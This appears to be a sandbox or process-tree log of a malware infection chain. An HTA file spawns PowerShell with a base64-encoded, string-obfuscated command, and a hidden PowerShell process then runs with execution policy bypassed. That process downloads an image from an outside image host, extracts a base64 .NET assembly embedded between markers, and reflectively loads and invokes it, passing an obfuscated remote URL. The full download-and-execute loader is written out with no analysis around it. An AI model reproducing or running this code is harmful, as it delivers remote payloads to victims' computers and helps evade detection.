iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\File_HTA.hta.html
2172powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
1220powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOMe[4]+$pSHome[34]+'X') ( (('{1}ima'+'geUrl = {0}https://uploaddeimagens.com.br/images/004/667/608/o'+'riginal/hta.jpg?1700268840{0};{1}webClient = New-Object System.Net.WebClient;{1}imag'+'eBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding]::UTF8.GetString({1}imageBy'+'tes);{1}startFlag = {0}<'+'<BASE64_STA'+'RT>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += '+'{1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}ba'+'se64Command = {1}im'+'ageText'+'.'+'Substring({1}startIndex, {1}base64Le'+'ngth);{1}'+'c'+'ommandBytes = [S'+'yste'+'m.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]::Load({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}dHh0LmtjaXBodG'+'9vdC8wMzEuODQyLjI5LjE5Ly86cHR0aA=={0} , {0}dfdfd{0'+'} , {0}dfdf{0} , {0}d'+'fdf{0} , {0'+'}dadsa{0} , {0}de{0} , {0}cu{0}))') -F [cHAR]39,[cHAR]36))"
2164